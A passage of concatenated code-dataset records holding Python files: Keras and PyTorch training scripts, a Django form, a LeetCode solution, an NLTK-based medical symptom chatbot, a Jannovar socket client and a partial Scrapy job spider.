input_length=max_len))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.MaxPooling1D(5))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\n#model.add(layers.GlobalMaxPooling1D())\nmodel.add(layers.GRU(32, dropout=0.1, recurrent_dropout=0.5))\nmodel.add(layers.Dense(3))\nmodel.summary()\nmodel.compile(optimizer=RMSprop(lr=1e-4),\n loss='categorical_crossentropy',\n metrics=['acc'])\nhistory = model.fit(x_train, y_train,\n epochs=100,\n batch_size=128,\n validation_data=(x_val, y_val))\n\n\n\n\nimport matplotlib.pyplot as plt\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(acc) + 1)\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.show()\n\nscores= model.evaluate(x_test, y_test,verbose=0)\nprint(\"Accuracy: %.2f%%\" % 
(scores[1]*100))","sub_path":"python/list654.py","file_name":"list654.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444841113","text":"from django import forms\n\nfrom .models import *\n\nclass ProjectForm(forms.ModelForm):\n title = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255)\n members = forms.ModelMultipleChoiceField(queryset=User.objects.all())\n class Meta:\n model = Project\n fields = ['title']\n\n","sub_path":"teamwork/apps/projects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419540633","text":"\n\n__author__ = \"zcTresure\"\n\n\nclass Solution:\n def removeKdigits(self, num: str, k: int) -> str:\n numStack = []\n for digit in num:\n while k and numStack and numStack[-1] > digit:\n numStack.pop()\n k -= 1\n numStack.append(digit)\n finalStack = numStack[:-k] if k else numStack\n return \"\".join(finalStack).lstrip('0') or \"0\"\n\n\nnum = \"1432219\"\nk = 3\ntest = Solution()\nprint(test.removeKdigits(num, k))\n","sub_path":"questions/1-1000/400-499/402. 移掉K位数字.py","file_name":"402. 移掉K位数字.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"198693419","text":"# import re\n# l = ['s[1]', 's[2]', 's[11]', 's[14]']\n\n# pattern = \"[0-9]\"\n# ll = re.findall(pattern, l[0])\n\n# print(ll)\n\nd = { \"11\" : 1, \"22\" : 2, \"33\" : 3}\nprint(len(d))\nsort_keys = sorted(d.values())\ndata = {}\nprint(sort_keys)\n\ni = 0\nfor k in sort_keys:\n if k not in data.values():\n id = \"col_\" + str(i)\n data[id] = k\n i += 1\nprint(data)","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"60584471","text":"import torch \nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport argparse\n\ntorch.manual_seed(42)\n\n# fixed network parameters\nimage_size = 64\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass Generator(nn.Module):\n def __init__(self, nz, ngf, nc):\n super(Generator, self).__init__()\n self.main = nn.Sequential( \n nn.ConvTranspose2d( nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n\n nn.ConvTranspose2d( ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. 
(nc) x 64 x 64\n )\n\n def forward(self, inp):\n return self.main(inp)\n\nclass Discriminator(nn.Module):\n def __init__(self, nc, ndf):\n super(Discriminator, self).__init__()\n self.discriminator = nn.Sequential(\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, inp):\n out = self.discriminator(inp)\n out = out.view(1, -1)\n return out.squeeze(1)\n\ndef main(opt, dataloader):\n netG = Generator(opt.nz, opt.ngf, opt.nc)\n netG.apply(weights_init)\n \n netD = Discriminator(opt.nc, opt.ndf)\n netD.apply(weights_init)\n\n loss = nn.BCELoss()\n\n fixed_noise = torch.randn(opt.num_batchs, opt.nz, 1, 1)\n real_label = 1\n fake_label = 0\n\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n \n for e in range(opt.epochs):\n for i, data in enumerate(dataloader, 0):\n \n netD.zero_grad()\n inp = data[0]\n batch_size = inp.size(0)\n label = torch.full((batch_size, ), real_label)\n \n output = netD(inp)\n\n errD_real = loss(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n noise = torch.randn(batch_size, opt.nz, 1, 1)\n fake_img = netG(noise)\n label.fill_(fake_label)\n output = netD(fake_img.detach())\n errD_fake = loss(output, label)\n errD_fake.backward()\n\n D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n optimizerD.step()\n\n netG.zero_grad()\n label.fill_(real_label)\n output = netD(fake_img)\n errG = loss(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n print('[%d/%d][%d/%d] Loss_D: %.4f Loss_G: %.4f D(x): %.4f D(G(z)): %.4f / %.4f'% \\\n (e, opt.epochs, i, len(dataloader),errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n vutils.save_image(inp,'%s/real_samples.png' % opt.out_dir, normalize=True)\n fake = netG(fixed_noise)\n vutils.save_image(fake.detach(),'%s/fake_samples_epoch_%03d.png' % (opt.out_dir, e),normalize=True)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Generative Adversarial Neural Network')\n\n parser.add_argument('root', help='Directory containing the training images')\n parser.add_argument('--lr', type=float, help='Network learning rate', default=0.0002)\n parser.add_argument('--epochs', type=int, help='Training epochs', default=1000)\n parser.add_argument('--beta1', type=float, help='Adam beta1 parameter', default=0.5)\n parser.add_argument('--num-batchs', type=int, help='Training batches size', default=1)\n parser.add_argument('--workers', type=int, help='Number of parallel threads', default=4)\n parser.add_argument('--nz', type=int, help='Z Noise size', default=100)\n parser.add_argument('--nc', type=int, help='Number of channels of input images', default=3)\n parser.add_argument('--ndf', type=int, help='Number of discriminator features', default=64)\n parser.add_argument('--ngf', type=int, help='Number of generator features', default=64)\n parser.add_argument('--out-dir', help='Generated images output directory', default='./output-images')\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n\n 
opt = parse_args()\n print(opt)\n\n dataset = dset.ImageFolder(root=opt.root,\n transform=transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]))\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.num_batchs, shuffle=True, num_workers=opt.workers)\n main(opt, dataloader)\n\n","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300075052","text":"\"\"\"\r\n@author: abdo\r\nemail : abdo.elsaadny74@gmail.com \r\n\"\"\"\r\n\r\n#import libraries\r\nimport pandas as pd\r\n# import seaborn as sns\r\n# import matplotlib.pyplot as plt\r\n# import numpy as np\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nfrom sklearn.model_selection import train_test_split\r\n# from sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nimport wikipedia\r\nimport nltk\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom nltk.tokenize import word_tokenize\r\nimport re\r\n\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.corpus import stopwords\r\nimport random\r\nimport db\r\nfrom fuzzywuzzy import process\r\n\r\n\r\n\r\n# text pre-processing helpers: stemming and stop-word removal\r\n# stop words: words that carry no meaning in english like [the, and, ...] \r\ndef stemming(text):\r\n wt=word_tokenize(text)\r\n ps = PorterStemmer()\r\n word=[]\r\n for i in wt:\r\n x=ps.stem(i)\r\n word.append(x)\r\n return word\r\n\r\ndef stopWords(text):\r\n #text is a sentence\r\n englishword = set(stopwords.words('english'))\r\n filtered = []\r\n words = word_tokenize(text)\r\n for i in words:\r\n if i not in englishword:\r\n filtered.append(i)\r\n return filtered\r\n\r\ndef sorry():\r\n messages = [\"I'm sorry I could not understand that. Let's try again.\"]\r\n return messages\r\n\r\n#greeting and prompt helpers \r\ndef ask_symptoms():\r\n messages = ['Type your symptoms']\r\n return messages\r\ndef greet():\r\n greeting=['hi','hello'] \r\n gr = random.choice(greeting)\r\n messages = [gr,\"I'm MedicalBot, your personal health assistant.\\n I can do that for you : \\n 1-diagnoses of illnesses. \\n 2-Book intensive care unit. \\n Please select the number of the service that you want : \"]\r\n return messages\r\n# greet()\r\n''' \r\ndef chosing ():\r\n messages1=\"I can do that for you :\"\r\n messages2=\"1-diagnoses of illnesses.\"\r\n messages3=\"2-Book intensive care unit.\"\r\n messages4=\"PLZ select number of service that you want :\"\r\n return messages1 , messages2 , messages3 , messages4\r\n '''\r\n \r\n\r\ndef asknames():\r\n askname= [\"what's your name ? \",'your name ? ']\r\n na=random.choice(askname)\r\n messages = [na]\r\n return messages\r\n \r\n# asknames()\r\n\r\ndef getName(text):\r\n \r\n filtered = stopWords(text)\r\n\r\n\r\n tag = nltk.pos_tag(filtered)\r\n \r\n noun=[]\r\n for i in range(len(tag)):\r\n\r\n if ((str(tag[i][1])=='NN' or str(tag[i][1])=='NNP') and str(tag[i][0])!='name'):\r\n noun.append(tag[i][0])\r\n\r\n # chunk every tag, then chink away verbs/determiners/prepositions/adjectives so candidate names remain\r\n chunkGram = r\"\"\"Chunk: {<.*>*}\r\n }<VB>{\r\n }
<DT>{\r\n }<IN>{\r\n }<VBD>{\r\n }<JJ>{\r\n \"\"\"\r\n chunkParser = nltk.RegexpParser(chunkGram)\r\n chunked = chunkParser.parse(tag)\r\n\r\n for i in chunked:\r\n if i != ('name','NN','VB','DT','IN','VBD','JJ'):\r\n name = i\r\n messages = f\"Welcome {name[0]}\"\r\n return messages\r\n\r\n# getName(\"my name is abdelrhman \")\r\n\r\n\r\n\r\n# greet()\r\n# yourname =asknames()\r\n# myname=getName(yourname)\r\n\r\ndef askAges(uuid):\r\n askage=['how old are you ? ',\"i'd like to know your age ? \",'tell me your age ? ']\r\n age=random.choice(askage)\r\n \r\n messages = [getName(db.get_name(uuid)),age]\r\n return messages\r\n #inp = input()\r\n #return inp\r\n# askAges()\r\n \r\ndef getAge(uuid,inage):\r\n\r\n filtered = stopWords(inage)\r\n for i in filtered:\r\n try:\r\n age = int(i)\r\n except Exception:\r\n continue\r\n #print(myname,' : ' ,age)\r\n messages = [str(db.get_name(uuid))+\":\"+str(age),askGender()]\r\n return messages\r\n\r\n# yourAge = askAges()\r\n# age = getAge(yourAge)\r\n\r\n#this function asks the user for his gender\r\n \r\ndef askGender():\r\n messages = 'Are you a Male or a Female?'\r\n return messages\r\n\r\n# this function returns the gender of the user \r\ndef getGender(text):\r\n\r\n filtered = stopWords(text)\r\n flag=0\r\n for i in filtered:\r\n if i.lower()=='male' or i.lower()=='female':\r\n \r\n gender = i\r\n flag=1\r\n if flag!=1:\r\n return 0\r\n else:\r\n return gender\r\n\r\n# askGender()\r\n# getGender()\r\n\r\n# -----------------------------------------------------------------------------\r\nclass Natural_language_processing:\r\n\r\n def __init__(self):\r\n \r\n self.info = []\r\n \r\n \r\n \r\n def extract(self,text):\r\n stopWords(text)\r\n token=stemming(text)\r\n\r\n tagged=nltk.pos_tag(token)\r\n \r\n # chunk every tag run, then chink out function words so symptom phrases remain\r\n chunkgram=r\"\"\"chunk : {<.*>+}\r\n 
\t\t}<VB.*|DT|IN|PRP.*|CC|TO>+{\r\n \"\"\"\r\n \r\n self.info=[]\r\n chunkparser=nltk.RegexpParser(chunkgram)\r\n chunked=chunkparser.parse(tagged)\r\n # chunked.draw() \r\n \r\n \r\n \r\n for element in chunked:\r\n if hasattr(element, 'label'):\r\n temp = ' '.join(e[0] for e in element)\r\n self.info.append(temp)\r\n \r\n return self.info\r\n \r\nNLP=Natural_language_processing()\r\n \r\n\r\n# Function to convert the list to string \r\ndef listToString(text): \r\n \r\n str1 = \" \" \r\n \r\n return (str1.join(text)) \r\n\r\n \r\n \r\n# -----------------------------------------------------------------------------\r\ndf = pd.read_csv('datasets\\diseasedata.csv')\r\ndf.isnull().sum().sort_values(ascending=False)\r\ndf['prognosis'].value_counts(normalize = True)\r\ndf.dtypes.unique()\r\n\r\nx = df.drop(['prognosis'],axis =1)\r\ny = df['prognosis']\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)\r\nx_test.shape\r\n\r\nDTC = DecisionTreeClassifier(criterion='entropy', max_depth=10,random_state=80)\r\n\r\n\r\n\r\n# knn=KNeighborsClassifier()\r\n# knn.fit(x_train,y_train)\r\n# knn.predict(x_test)\r\n# # print ('scores for train= ',knn.score(x_test, y_test))\r\n# # print('scores for test : ' , knn.score(x_test, y_test))\r\n# y_pred = knn.predict(x_test)\r\n# print('accuracy_score:',accuracy_score(y_pred,y_test))\r\n\r\ntest_scores={}\r\ntrain_scores={}\r\nfor i in range(2,4,2):\r\n kf = KFold(n_splits = i)\r\n sum_train = 0\r\n sum_test = 0\r\n data = df\r\n for train,test in kf.split(data):\r\n train_data = data.iloc[train,:]\r\n test_data = data.iloc[test,:]\r\n x_train = train_data.drop([\"prognosis\"],axis=1)\r\n y_train = train_data['prognosis']\r\n x_test = test_data.drop([\"prognosis\"],axis=1)\r\n y_test = test_data[\"prognosis\"]\r\n algo_model = DTC.fit(x_train,y_train)\r\n sum_train += DTC.score(x_train,y_train)\r\n y_pred = DTC.predict(x_test)\r\n sum_test += accuracy_score(y_test,y_pred)\r\n average_test = sum_test/i\r\n average_train = sum_train/i\r\n test_scores[i] = average_test\r\n train_scores[i] = average_train\r\n\r\n\r\n#for check only\r\n# real_diseases = y_test.values\r\n\r\n# for i in range(0, len(real_diseases)):\r\n# if y_pred[i] == real_diseases[i]:\r\n# # print ('Pred: {0} Actual:{1}'.format(y_pred[i], real_diseases[i]))\r\n# else:\r\n# # print('wrong prediction')\r\n# # print ('Pred: {0} Actual:{1}'.format(y_pred[i], real_diseases[i]))\r\n \r\n \r\n \r\nCM = confusion_matrix(y_test, y_pred)\r\n# print('Confusion Matrix is : \\n', CM)\r\n \r\n# sns.heatmap(CM, center = True)\r\n\r\n# plt.show()\r\n\r\n\r\n# df['prognosis'].value_counts(normalize = False).plot.scatter()\r\n# plt.subplots_adjust(left = 0.9, right = 2 , top = 2, bottom = 1)\r\n\r\n# -----------------------------------auto correction----------------------------\r\nReplacement_pattern ={\"rash skin\":\"skin_rash\",\"skin rash\":\"skin_rash\",\r\n \r\n \" sneez\":\"continuous_sneez\",\"continuous sneaz\":\"continuous_sneezing\",\r\n \r\n \"stomach pain\" :\"stomach_pain\",\"pain stomache\":\"stomach_pain\",\r\n \"muscle wast\":\"muscle_wasting\",\"wast muscle\":\"muscle_wasting\",\r\n \"cold hands\":\"cold_hands_and_feets\",\"cold hand and feet\":\"cold_hands_and_feets\",\"cold feets\":\"cold_hands_and_feets\",\r\n \"weight gain\":\"weight_gain\",\"gain weight\":\"weight_gain\",\r\n \"weight loss\":\"weight_loss\",\"loss weight\":\"weight_loss\",\r\n \r\n \"high fever\":\"high_fever\",\"fever 
high\":\"high_fever\",\r\n \"breathless\":\"breathlessness\",\"low breath\":\"breathlessness\",\r\n \"head mild fever\":\"headache\",\"ashe\":\"headache\",\r\n \"back pain\":\"back_pain\",\"pain back\":\"back_pain\",\r\n \"runny nose\":\"runny_nose\",\"nose runy\":\"runny_nose\",\r\n \"chest pain\":\"chest_pain\",\"pain chest\":\"chest_pain\",\r\n \"fast heart \":\"fast_heart_rate\",\"fast heart rate\":\"fast_heart_rate\",\r\n \"neck pain\":\"neck_pain\",\"pain neck\":\"neck_pain\"\r\n\r\n }\r\n\r\n\r\ndef expand_contractions(sentence, text): \r\n \r\n contractions_pattern = re.compile('({})'.format('|'.join(text.keys())), \r\n flags=re.IGNORECASE|re.DOTALL) \r\n def expand_match(contraction): \r\n match = contraction.group(0) \r\n first_char = match[0] \r\n expanded_contraction = text.get(match) if text.get(match) else text.get(match.lower()) \r\n expanded_contraction = first_char+expanded_contraction[1:] \r\n return expanded_contraction \r\n \r\n expanded_sentence = contractions_pattern.sub(expand_match, sentence) \r\n return expanded_sentence \r\n \r\n\r\ndef splitting(text): \r\n return ([i for item in text for i in item.split()]) \r\n\r\nwith open(\"datasets\\sym.txt\",\"r\") as f :\r\n sym=f.read().split('\\n')\r\n\r\ndef match(query,choise,limit=1):\r\n result=process.extract(query,choise,limit=limit)\r\n return result\r\n\r\n\r\n\r\ndef fuzzy(text):\r\n text1=word_tokenize(text)\r\n correction=[]\r\n for i in text1:\r\n a=match(i,sym)\r\n if (a[0][1]<80):\r\n continue\r\n else:\r\n correction.append(a[0][0])\r\n return correction\r\n# ---------------------------------end autocorrection-------------------------------\r\n\r\n\r\ndef getdisease(symptoms):\r\n \r\n l=NLP.extract(symptoms)\r\n lts=listToString(l)\r\n # print (lts)\r\n \r\n expanded_corpus =[expand_contractions(txt, Replacement_pattern) \r\n for txt in sent_tokenize(lts)]\r\n words=splitting(expanded_corpus)\r\n lts1=listToString(words)\r\n # print(lts1)\r\n correction_word=fuzzy(lts1)\r\n # print(correction_word)\r\n \r\n token = [str(x) for x in correction_word]\r\n a=[]\r\n compare=[item for item in token if item in x.columns]\r\n \r\n for i in (x.columns):\r\n \r\n if i in compare:\r\n a.append(1)\r\n elif i not in compare:\r\n a.append(0)\r\n else:\r\n return sorry()\r\n \r\n y_diagnosis = DTC.predict([a])\r\n y_pred_2 = DTC.predict_proba([a])\r\n # prediction = f\"i predict you have {y_diagnosis[0]} disease, confidence score of : {y_pred_2.max()* 100}%\"\r\n # prediction = (('i predict you have %s disease, confidence score of : = %s') %(y_diagnosis[0],y_pred_2.max()* 100),'%' )\r\n \r\n wiki=str(y_diagnosis[0])\r\n #print ('this is info about your disease :')\r\n #print ('\\n',wikipedia.summary(wiki, sentences=2))\r\n \r\n #print(('Name = %s , Age : = %s') %(i_name,i_age))\r\n\r\n messages = [f\"i predict you have {y_diagnosis[0]} disease, confidence score of : {y_pred_2.max()* 100}%\",'this is info about your disease :',wikipedia.summary(wiki, sentences=2),'note : \\n Do not depend on this result .. Please see a doctor']\r\n return messages\r\n\r\n#def note():\r\n# messages=['note : \\n Do not depend on this result .. 
Please see a doctor']\r\n# return messages\r\n\r\n# getdisease('cough and brethless and high fever')\r\n\r\n \r\n \r\n\r\n#start conversation :the point that acully start with \r\n\r\n\"\"\"\r\nif inpp == 1:\r\n yourname = asknames()\r\n myname=getName(yourname)\r\n yourAge = askAges()\r\n age = getAge(yourAge)\r\n \r\n yourgender = askGender()\r\n gender = getGender(yourgender)\r\n while gender==0:\r\n sorry()\r\n ufGender = askGender()\r\n gender = getGender(ufGender)\r\n \r\n getdisease() \r\n \r\nelif inpp==2:\r\n print ('you are choosed 2')\r\n\"\"\"\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n print (greet())\r\n inpp=str (input())\r\n if inpp=='1':\r\n print(asknames())\r\n names=input()\r\n print (getName(names))\r\n\r\n# askAges()\r\n# ages=input()\r\n# getAge()\r\n \r\n print (askGender())\r\n genders=input()\r\n getGender(genders)\r\n while genders==0:\r\n print(sorry())\r\n print (askGender())\r\n genders=input()\r\n print(getGender(genders))\r\n \r\n print(ask_symptoms())\r\n symptoms=str (input())\r\n print (getdisease(symptoms))\r\n \r\n \r\n elif inpp=='2':\r\n print ('This service will be available in the near future')\r\n \r\n \r\n \r\n \r\n# getdisease(' high fever and breathless and cough')\r\n \r\n \r\n \r\n","sub_path":"src/Medbot.py","file_name":"Medbot.py","file_ext":"py","file_size_in_byte":14531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"143151597","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 23 11:16:39 2018\n\n@author: toast\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as Data\nfrom torch.autograd import Variable\n\n#HYPER PARAMETERS\nEPOCH = 10\nBATCH_SIZE = 64\nLR = 0.0001\nDATA_LOAD = 0\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN,self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2)\n )\n self.fc = nn.Sequential(\n nn.Linear(32*12*12,7),\n# nn.ReLU(),\n# nn.Linear(15,7)\n )\n \n \n \n def forward(self,x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size(0),-1)\n x = self.fc(x)\n return x\n\n\n\n\n\n#DATA PREPROCESSING\n\nif DATA_LOAD:\n data = []\n label = []\n df = pd.read_csv(\"../data/HW3_train.csv\")\n df_data = df.values.T\n del df\n label = df_data[0]\n _data = df_data[1]\n del df_data\n for i in _data:\n tmp = [float(x) for x in i.split(' ')]\n data.append(tmp)\n \n data = np.array(data)\n data = np.reshape(data,(-1,1,48,48)) #BATCH,CHANNEL,HEIGHT,WIDTH\n data = data/255.\n\n data = torch.from_numpy(data.astype('float32')) \n label = torch.from_numpy(label.astype('int32'))\n \n data_set = Data.TensorDataset(data,label)\n loader = Data.DataLoader(\n dataset = data_set,\n batch_size = BATCH_SIZE,\n shuffle = True,\n num_workers=2)\n\n\n\n \n\n#NN\ncnn = CNN()\nif torch.cuda.is_available:\n cnn.cuda()\n\noptimizer = optim.Adam(cnn.parameters(),lr=LR)\nloss_func = nn.CrossEntropyLoss()\n\nfor epoch in range(EPOCH):\n for step, (x,y) in enumerate(loader):\n Bx = Variable(x)\n By = Variable(y)\n \n pred = cnn(Bx.cuda())\n loss = loss_func(pred.cuda(),By.cuda())\n \n 
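# standard PyTorch update: clear stale gradients, backpropagate the loss, then step the optimizer\n        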
optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if step%64==0:\n pred = torch.max(pred.cpu(),1)[1].data.numpy()\n By = By.cpu().data.numpy()\n acc = (By==pred).mean()\n# print('loss is %.3f' % loss.data[0])\n print('acc is %.3f' % acc)\n\n\n\n\n\n\"\"\"\nTx = []\nTy = []\ndf = pd.read_csv(\"../data/HW3_test.csv\")\ndf_data = df.values.T\ndel df\nTy = df_data[0]\n_data = df_data[1]\ndel df_data\nfor i in _data:\n tmp = [float(x) for x in i.split(' ')]\n Tx.append(tmp)\n\nTx = np.array(Tx)\nTx = np.reshape(Tx,(-1,1,48,48)) #BATCH,CHANNEL,HEIGHT,WIDTH\nTx = Tx/255.\n\nTx = torch.from_numpy(Tx.astype('float32')) \nTy = torch.from_numpy(Ty.astype('int32'))\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"580249265","text":"'''Client Interface to Jannovar VCF converter server.\n'''\nimport socket\nimport select\nimport logging\nimport io\nimport typing\n\nfrom contextlib import contextmanager\n\nfrom lib.vcf_jannovar import jannovar_vcf_to_table\nfrom lib.singleton import LazyConfigure\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JannovarClient(LazyConfigure):\n '''Implements a basic stream socket client.\n Built after simple toy implementation here:\n https://docs.python.org/3/howto/sockets.html\n '''\n\n def __init__(\n self,\n ):\n super().__init__()\n self.url = None\n self.port = None\n\n def configure(\n self,\n url: str = \"localhost\",\n port: int = 8888,\n ):\n super().configure()\n self.url = url\n self.port = port\n\n def create_vcf(\n self,\n variants: [str],\n zygosity: str,\n case_id: str,\n ) -> typing.Union[\"pandas.DataFrame\", str]:\n '''Create pandas dataframe with vcf information.'''\n status, vcf_text = self.process_variants(variants)\n # return error\n if status < 0:\n return vcf_text\n\n with io.StringIO(vcf_text) as reader:\n vcf_table = jannovar_vcf_to_table(\n reader, case_id, zygosity, variants\n )\n\n return vcf_table\n\n def process_variants(self, variants: [str]) -> (int, str):\n '''Submit hgvs vcf file from server.'''\n msg = \"\\n\".join(variants) + \"\\n\"\n\n msg = \"{}\\n{}\".format(len(msg), msg)\n\n byte_msg = msg.encode(\"utf-8\")\n data = None\n status = 0\n with self._connect() as con:\n try:\n self._send(con, byte_msg)\n ready = select.select([con], [], [], 20)\n if ready[0]:\n status, raw_data = self._recv(con)\n data = raw_data.decode(\"utf-8\")\n except RuntimeError as error:\n LOGGER.warning(error)\n data = None\n return status, data\n\n def can_connect(self):\n '''Test whether server can be reached.'''\n try:\n with self._connect():\n pass\n except ConnectionRefusedError:\n return False\n return True\n\n @contextmanager\n def _connect(self):\n '''Handle connection to jannovar server.'''\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((self.url, self.port))\n yield connection\n connection.close()\n\n @staticmethod\n def _send(sock: socket.socket, msg: bytes):\n sent_bytes = 0\n\n while sent_bytes < len(msg):\n sent = sock.send(msg[sent_bytes:])\n if sent == 0:\n raise RuntimeError(\"connection broken\")\n sent_bytes += sent\n\n @staticmethod\n def _recv(sock: socket.socket) -> (int, bytes):\n # infer size from first line\n initial = sock.recv(2048)\n msglen, status, chunk = initial.split(b\"\\n\", 2)\n msglen = int(msglen.decode(\"utf-8\"))\n status = int(status.decode(\"utf-8\"))\n bytes_recd = len(chunk)\n chunks 
= [chunk]\n\n while bytes_recd < msglen:\n chunk = sock.recv(min(msglen - bytes_recd, 2048))\n\n if chunk == b\"\":\n raise RuntimeError(\"connection broken\")\n\n chunks.append(chunk)\n bytes_recd += len(chunk)\n\n return status, b\"\".join(chunks)\n","sub_path":"lib/api/jannovar.py","file_name":"jannovar.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145677709","text":"# _*_ coding: utf-8 _*_\n\"\"\"This file is a job120 spider created on top of the ATSSpider\nscrapy crawl job120 -a url=\"http://www.job120.com/search/info.aspx\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://www.job120.com/search/info.aspx\n\"\"\"\nfrom re import compile\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\n\nclass Job120(ATSSpider):\n\n name = \"job120\"\n ref_reg = compile(\"-(\\d+)\\.html\")\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//div[@class='pss_rnr']/ul/li/div\")\n for job in jobs:\n job_link = job.xpath(\"./h1/a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\"./h1/a[1]//text()\").extract(),\n 'company': job.xpath(\"./h1/a[2]//text()\").extract(),\n 'location': job.xpath(\n \".//p/node()[contains(.,'%s')]\"\n % unicode(\"工作地点:\", 'utf-8')\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n next_page = sel.xpath(\n \"//a[contains(text(),'%s')]/@href\" % unicode('下一页', 'utf-8')\n ).extract()\n if next_page:\n yield Request(next_page[0], callback=self.parse)\n\n def parse_job(self, response):\n 